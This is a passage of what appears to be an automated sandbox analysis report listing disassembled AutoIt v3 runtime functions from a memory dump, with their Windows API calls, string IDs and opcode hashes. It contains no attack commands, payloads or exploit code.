                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13755
                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00A13761
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A1379D
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137BF
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137D2
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137DD
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137E6
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137F5
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A137FE
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13805
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00A13810
                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13822
                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A30C04,00000000), ref: 00A13838
                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00A13848
                                                                                                                                                                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A1386E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A1388D
                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A138AF
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A13A9C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                  • Opcode ID: b878812ff1c5abb398ea0aec164bc430ce6045b6bfe3cde094563a1455638bef
                                                                                                                                                                                                                                  • Instruction ID: 00fd1eb8ffbd558c450002e9e71a25cfc27a9f5c2fd1a5666b871f20863043b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b878812ff1c5abb398ea0aec164bc430ce6045b6bfe3cde094563a1455638bef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92027F72900215AFDF14DFA8CD49EAE7BB9FF48310F148158F915AB2A1C774AD42CB60
                                                                                                                                                                                                                                  Function 00A27B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00A27B67
                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A27B98
                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00A27BA4
                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00A27BBE
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00A27BCD
                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00A27BF8
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000010), ref: 00A27C00
                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00A27C07
                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 00A27C16
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00A27C1D
                                                                                                                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00A27C68
                                                                                                                                                                                                                                  • FillRect.USER32(?,?,?), ref: 00A27C9A
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A27CBC
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColor.USER32(00000012), ref: 00A27E5B
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SetTextColor.GDI32(?,00A27B2D), ref: 00A27E5F
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColorBrush.USER32(0000000F), ref: 00A27E75
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColor.USER32(0000000F), ref: 00A27E80
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetSysColor.USER32(00000011), ref: 00A27E9D
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A27EAB
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SelectObject.GDI32(?,00000000), ref: 00A27EBC
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SetBkColor.GDI32(?,?), ref: 00A27EC5
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: SelectObject.GDI32(?,?), ref: 00A27ED2
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00A27EF1
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A27F08
                                                                                                                                                                                                                                    • Part of subcall function 00A27E22: GetWindowLongW.USER32(?,000000F0), ref: 00A27F15
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4124339563-0
                                                                                                                                                                                                                                  • Opcode ID: 113017ec88992003620b7fad47a8d37809ddf65881329da047cd4beffb0c2927
                                                                                                                                                                                                                                  • Instruction ID: 71b01b0f58613382e546876a42806ca6c118108e31a921d0d921ec421cb97b99
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 113017ec88992003620b7fad47a8d37809ddf65881329da047cd4beffb0c2927
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBA18E72008311AFD721DFA8DC48E6FBBA9FF48324F100A29F962961E1D775D946CB51
                                                                                                                                                                                                                                  Function 00991625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?), ref: 009916B4
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 009D2B07
                                                                                                                                                                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009D2B40
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009D2F85
                                                                                                                                                                                                                                    • Part of subcall function 00991802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00991488,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 00991865
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001053), ref: 009D2FC1
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009D2FD8
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D2FEE
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 009D2FF9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                  • Opcode ID: 79caddd68786ce56799d40729c44f458cb30fe511b260139803ec5898d589ff7
                                                                                                                                                                                                                                  • Instruction ID: 9964901bf067ee2667a0d956647c6b01757dabc50e84055db244050b7148f5be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79caddd68786ce56799d40729c44f458cb30fe511b260139803ec5898d589ff7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2212BD30644602AFDB25CF68C854BB9BBF9FB94300F18856AF4959B261C775EC82CF91
                                                                                                                                                                                                                                  Function 00A1316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 00A1319B
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A132C7
                                                                                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A13306
                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A13316
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A1335D
                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00A13369
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A133B2
                                                                                                                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A133C1
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00A133D1
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00A133D5
                                                                                                                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A133E5
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A133EE
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00A133F7
                                                                                                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A13423
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A1343A
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A1347A
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A1348E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A1349F
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A134D4
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00A134DF
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A134EA
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A134F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                  • Opcode ID: b70a89df6afb3a5ac1822f1f6b170e541ff2f531c1f2161c3a0b1ac2f0eff770
                                                                                                                                                                                                                                  • Instruction ID: 2270a13eddca40836d869578821e99080138cc7c33720bbfe4dfde06d0669ccc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b70a89df6afb3a5ac1822f1f6b170e541ff2f531c1f2161c3a0b1ac2f0eff770
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCB14DB1A00215AFEF14DFA8DC4AFAE7BB9EB48710F104114F915EB291D7B4AD41CB94
                                                                                                                                                                                                                                  Function 00A05524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00A05532
                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00A2DC30,?,\\.\,00A2DCD0), ref: 00A0560F
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00A2DC30,?,\\.\,00A2DCD0), ref: 00A0577B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                  • Opcode ID: dc44c1117feb83861c6219be63859b82cb0bcd315c4d9472de0e7fc97b3c8d55
                                                                                                                                                                                                                                  • Instruction ID: c899a9f8d15815ce9dfa85cd51a0ba726ee0cf8b4ae9409ec5b54c9b3b3f76e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc44c1117feb83861c6219be63859b82cb0bcd315c4d9472de0e7fc97b3c8d55
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2861CF31E08A0DEBCB24DF38E99197E73B1BF54351B284825E806BB2D1D6329D06EF41
                                                                                                                                                                                                                                  Function 00A21A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00A21BC4
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00A21BD9
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00A21BE0
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A21C35
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00A21C55
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A21C89
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A21CA7
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A21CB9
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00A21CCE
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A21CE1
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(00000000), ref: 00A21D3D
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A21D58
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A21D6C
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00A21D84
                                                                                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00A21DAA
                                                                                                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00A21DC4
                                                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00A21DDB
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 00A21E46
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                  • Opcode ID: 5b7d2c2f50a4dfc8906d49d740e0b656c07d8ba54c478b7c8bae56bfe8c63daf
                                                                                                                                                                                                                                  • Instruction ID: 1847a7d48c0976cbe737c6a158643a640a583411d4ec62fd15e36977a2b83429
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b7d2c2f50a4dfc8906d49d740e0b656c07d8ba54c478b7c8bae56bfe8c63daf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77B19E71604351AFDB14DF68D884B6ABBE5FF94310F00892CF9999B2A2C731E845CB92
                                                                                                                                                                                                                                  Function 00A20CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00A20D81
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A20DBB
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A20E25
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A20E8D
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A20F11
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A20F61
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A20FA0
                                                                                                                                                                                                                                    • Part of subcall function 009AFD52: _wcslen.LIBCMT ref: 009AFD5D
                                                                                                                                                                                                                                    • Part of subcall function 009F2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009F2BA5
                                                                                                                                                                                                                                    • Part of subcall function 009F2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009F2BD7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                  • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                  • Opcode ID: 272de667a00b2192c136dd46ac254de8c912616f6fc63494a2f53da44de37a6f
                                                                                                                                                                                                                                  • Instruction ID: 5382ae2b472d3a96c88b0e56845d5c55228e021cf46a6275a98e3d05cf9af71e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 272de667a00b2192c136dd46ac254de8c912616f6fc63494a2f53da44de37a6f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95E1CD312082518FCB14DF2CD951A7AB7E6BFD8314B14496CF896AB3A2DB30ED45CB91
                                                                                                                                                                                                                                  Function 00992521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009925F8
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00992600
                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0099262B
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00992633
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00992658
                                                                                                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00992675
                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00992685
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 009926B8
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 009926CC
                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 009926EA
                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00992706
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00992711
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetCursorPos.USER32(?), ref: 009919E1
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: ScreenToClient.USER32(00000000,?), ref: 009919FE
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000001), ref: 00991A23
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000002), ref: 00991A3D
                                                                                                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,0099199C), ref: 00992738
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
